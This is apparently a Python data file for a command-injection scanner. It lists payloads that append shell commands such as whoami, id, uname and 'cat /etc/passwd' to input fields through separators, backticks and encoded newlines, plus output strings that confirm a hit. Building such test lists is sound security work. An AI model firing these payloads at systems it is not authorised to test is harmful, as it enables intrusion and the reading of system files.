
QUICK_PAYLOADS = [
    "; whoami",
    "| whoami",
    "& whoami",
    "&& whoami",
    "|| whoami",
    "; id",
    "| id",
    "`whoami`",
    "$(whoami)",
    "; cat /etc/passwd",
]

FULL_PAYLOADS = [
    "| cat /etc/passwd",
    "&& cat /etc/passwd",
    "; uname -a",
    "| uname -a",
    "; ls -la",
    "| ls -la",
    "&& id",
    "|| id",
    "`id`",
    "$(id)",
    "; echo VULN_TEST_12345",
    "| echo VULN_TEST_12345",
    "&& echo VULN_TEST_12345",
    "|| echo VULN_TEST_12345",
    "; ping -c 1 127.0.0.1",
    "| ping -c 1 127.0.0.1",
    "; sleep 3",
    "| sleep 3",
    "&& sleep 3",
    "%0awhoami",
    "%0aid",
    ";\nwhoami",
    "& type C:\\Windows\\System32\\drivers\\etc\\hosts",
    "| type C:\\Windows\\System32\\drivers\\etc\\hosts",
    "; dir",
]

DETECTION_PATTERNS = [
    "uid=",
    "gid=",
    "root:",
    "/bin/bash",
    "/bin/sh",
    "www-data",
    "apache",
    "nginx",
    "VULN_TEST_12345",
    "linux",
    "darwin",
    "total ",
    "drwx",
    "-rw-",
    "127.0.0.1",
    "bytes from",
    "ttl=",
    "password",
    "nobody",
]
